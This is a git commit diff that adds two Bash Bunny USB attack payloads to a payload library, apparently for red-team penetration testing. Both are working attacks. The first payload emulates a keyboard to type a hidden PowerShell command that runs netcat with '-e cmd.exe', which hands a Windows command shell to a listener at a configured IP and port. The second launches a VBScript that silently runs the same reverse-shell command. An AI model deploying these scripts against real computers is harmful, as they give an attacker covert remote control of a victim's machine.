Merge pull request #40 from ralphyz/master

Reverse Shell - with auto-increment port
2025-10-29 16:58:25 +00:00 · 2017-03-16 10:34:57 +11:00
parent df5f9f804e 938be26260
commit aa6bc50c39
7 changed files with 276 additions and 0 deletions
--- a/payloads/library/RAZ_ReverseShell/listener_ip.txt
+++ b/payloads/library/RAZ_ReverseShell/listener_ip.txt
@@ -0,0 +1 @@
 192.168.1.100
--- a/payloads/library/RAZ_ReverseShell/listener_port.txt
+++ b/payloads/library/RAZ_ReverseShell/listener_port.txt
@@ -0,0 +1 @@
 4444
--- a/payloads/library/RAZ_ReverseShell/payload.txt
+++ b/payloads/library/RAZ_ReverseShell/payload.txt
@@ -0,0 +1,75 @@
 #!/bin/bash
 #
 # Title:         RAZ_ReverseShell
 # Author:        RalphyZ
 # Version:       1.0
 # Target:        Windows 7+
 # Dependencies:  The following files must exist in the switch folder:
 #                nc.exe - Windows binary for netcat with the -e flag
 #                listener_port.txt - The Port number for the netcat listener
 #                listener_ip.txt - The IP Address for the netcat listener
 # 
 # Description:   Executes a netcat reverse cmd shell at a given IP and Port
 #                Intentionally, this script leaves a trace in the Run Box
 #
 # Colors:
 # Green.....................Working
 # White.....................Completed without error
 # White (blinking)..........Incrementing the port in listener_port.txt
 # Blue (blinking)...........listener_port.txt was not found
 # Light-Blue (blinking).....listener_ip.txt was not found
 # Amber (blinking)..........nc.exe was not found
 # Change this if you want to enable auto_increment of the netcat port
 # If true, the port number is increased by 1 everytime the script runs
 # This is good for Red Teams doing PenTesting on multiple computers
 auto_increment=false
 LED G
 ATTACKMODE HID STORAGE
 LANGUAGE='us'
 # Get the switch position
 source bunny_helpers.sh
 # Check for all the files - error if not found. If found, put into variables
 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
    LED B 100
    exit 1
 else
  my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
 fi
 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
    LED B G 100
    exit 1
 else
    my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
 fi
 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
    LED R G 100
    exit 1
 fi 
 # Execute the powershell command in the run box with the appropriate variables
 QUACK GUI r
 QUACK DELAY 100
 QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
 QUACK ENTER
 # If auto_increment, then update the listener_port file
 if [ "$auto_increment" = true ] ; then   
   LED R G B 100
   echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
   # Allow the write to sync to the USB
   sleep 1
 fi
 # Signal everything went OK - white
 LED R G B
 exit 0
--- a/payloads/library/RAZ_VBScript/a.vbs
+++ b/payloads/library/RAZ_VBScript/a.vbs
@@ -0,0 +1,162 @@
 Option Explicit
 '==============================================================================
 ' Title:         a.vbs
 ' Author:        RalphyZ
 ' Version:       1.0
 ' Target:        Windows 7+
 '
 ' Description:
 ' This VBScript is used by a BashBunny payload to
 ' to create a netcat reverse shell.  The netcat listener
 ' IP Address and Port are stored in separate files - so that
 ' Red Teams can quickly change information.  The "IncrementPort"
 ' subroutine will increase the port number by 1 every time the
 ' script is called.  This is so that you can start multiple
 ' listeners while doing a PenTest, and grab multiple reverse
 ' shells in one trip.  Uncomment that if you want the auto-increment
 '
 ' Note: You must put the netcat executable in the strReverseShellPath directory
 '==============================================================================
 ' Declare Constants
 Const ForReading = 1
 Const ForWriting = 2
 ' Declare Global Variables
 Dim strListenerPort, strNewListenerPort, strListenerIP
 Dim objFSO, objFile, strCurrentDirectory
 Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
 ' The netcat executable name
 strNetCatEXE = "nc.exe"
 ' The folder location
 strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
 ' The file containing the listener port
 strListnerPortFile = "listener_port.txt"
 ' The file containing the listener ip address
 strListenerIPFile = "listener_ip.txt"
 ' Create a File System Object
 Set objFSO = CreateObject("Scripting.FileSystemObject")
 strCurrentDirectory = FindCurrentDirectory()
 ' Read the Host IP Address (where the listener resides)
 ReadHostIP
 ' Read the listener port
 ReadPort
 ' Increment the listener port - for multiple shells
 ' Great for Red Teams
 'IncrementPort
 ' Start NetCat Reverse Shell
 StartNetCat
 '==============================================================================
 '       Name: FindCurrentDirectory
 '  Arguments: None
 ' Return Value: None
 ' Description: Find the netcat executable
 '==============================================================================
 Function FindCurrentDirectory
    Dim objDrives, d
    ' Set default return value
    FindCurrentDirectory = ""
    ' Search all drives for the netcat exe
    Set objDrives = objFSO.Drives
    For Each d in objDrives   
        If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
            FindCurrentDirectory =  d + strReverseShellPath        
        End if
    Next
 End Function
 '==============================================================================
 '       Name: ReadHostIP
 '  Arguments: None
 ' Return Value: None
 ' Description: Read the listener IP                                         
 '==============================================================================
 Sub ReadHostIP()
    ' Opens the file for reading
    Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
    ' Read the host IP
    strListenerIP = objFile.ReadAll
    ' Close the file
    objFile.Close    
 End Sub
 '==============================================================================
 '       Name: ReadPort
 '  Arguments: None
 ' Return Value: None
 ' Description: Read the listener port                                          
 '==============================================================================
 Sub ReadPort()
    ' Opens the file for reading
    Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
    ' Read the listener port
    strListenerPort = objFile.ReadAll
    ' Close the file
    objFile.Close
 End Sub
 '==============================================================================
 '       Name: IncrementPort
 '  Arguments: None
 ' Return Value: None
 ' Description: Read the listener port, increment the counter by 1, and write   
 '             the new value                                                   
 '==============================================================================
 Sub IncrementPort()    
    ' Increment the listener port
    strNewListenerPort = strListenerPort + 1
    ' Open the file that contains the listener port for writing
    Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
    ' Write the new (incremented) port
    objFile.WriteLine strNewListenerPort
    ' Close the file
    objFile.Close
 End Sub
 '==============================================================================
 '       Name: StartNetCat
 '  Arguments: None
 ' Return Value: None
 ' Description: Start netcat on the appropriate port
 '==============================================================================
 Sub StartNetCat()
    Dim strNetCat, strCommand, objShell
    ' Build the path to the netcat executable    
    strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
    ' Create the command string to run netcat on the correct ip and port, 
    ' and serve cmd.exe to the listener
    strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
    ' Create the WScript Shell object       
    Set objShell = WScript.CreateObject ("WScript.Shell")
    ' Run the command (' , 0'= hidden)
    objShell.run strCommand, 0
    ' Free the object from memory
    Set objShell = Nothing
 End Sub
--- a/payloads/library/RAZ_VBScript/listener_ip.txt
+++ b/payloads/library/RAZ_VBScript/listener_ip.txt
@@ -0,0 +1 @@
 192.168.1.100
--- a/payloads/library/RAZ_VBScript/listener_port.txt
+++ b/payloads/library/RAZ_VBScript/listener_port.txt
@@ -0,0 +1 @@
 4444
--- a/payloads/library/RAZ_VBScript/payload.txt
+++ b/payloads/library/RAZ_VBScript/payload.txt
@@ -0,0 +1,35 @@
 #!/bin/bash
 #
 # Title:         RAZ_VBScript
 # Author:        RalphyZ
 # Version:       1.0
 # Target:        Windows 7+
 # Dependencies:  VBScript (a.vbs) in the switch folder with this file
 # 
 # Description:   Executes a VBScript, concealed in a hidden PowerShell window
 #
 # Colors:
 # Green.....................Working
 # White.....................Completed without error
 # Light-Blue (blinking).....a.vbs was not found
 LED G
 ATTACKMODE HID STORAGE
 # Get the switch position
 source bunny_helpers.sh
 # Check if a.vbs is present
 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
    LED B G 100
    exit 1
 fi
 # Run the VBScript
 QUACK GUI r
 QUACK DELAY 100
 QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
 QUACK ENTER
 # Green LED for finished
 LED R G B